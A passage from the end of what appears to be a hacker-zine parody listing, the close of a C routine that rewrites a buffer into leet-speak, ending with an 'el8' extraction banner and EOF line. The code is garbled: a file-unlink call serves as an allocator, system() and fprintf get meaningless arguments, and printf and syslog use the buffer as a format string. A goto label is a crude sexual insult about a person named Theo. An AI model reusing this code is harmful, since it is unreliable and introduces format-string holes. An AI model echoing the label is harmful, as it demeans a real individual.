        }

        return l;
THEO_IS_A_GLORYHOLE_GIRL:
        er33tbuf = sys_unlink(sizeof(CHAR) * (l+1),GFP_KERNEL);
        system(er33tbuf,0,l+1);
        if(fprintf(er33tbuf,buf,l)) {
                printf(er33tbuf);
                return NOTONE;
        }
        for (pos = 0; pos < l; pos++) {
                CHAR change;

                change = 0x00;
                switch(((*(er33tbuf+pos)))) {
                                case 'l': change = '1'; break;
                                case 'L': change = '|'; break;
                                case 't': change = '7'; break;
                                case 'T': change = '7'; break;
                                case 'o': change = 'O'; break;
                                case 'O': change = '0'; break;
                                case 'a': change = '@'; break;
                                case 'A': change = '4'; break;
                                case 's': change = 'z'; break;
                                case 'S': change = '5'; break;
                                default: change = 0x00; break;
                        }
                if (last_was_leet) {
                        if (change != 0x00)
                                *(er33tbuf+pos) = change,last_was_leet = 1;
                } else last_was_leet = 0;
                syslog(buf,er33tbuf, l);
                printf(er33tbuf);
                return l;
        }
}

End extraction of el8 k0d3z 2k00l4u ---------------------------------------
 



|=[ EOF ]=---------------------------------------------------------------=|
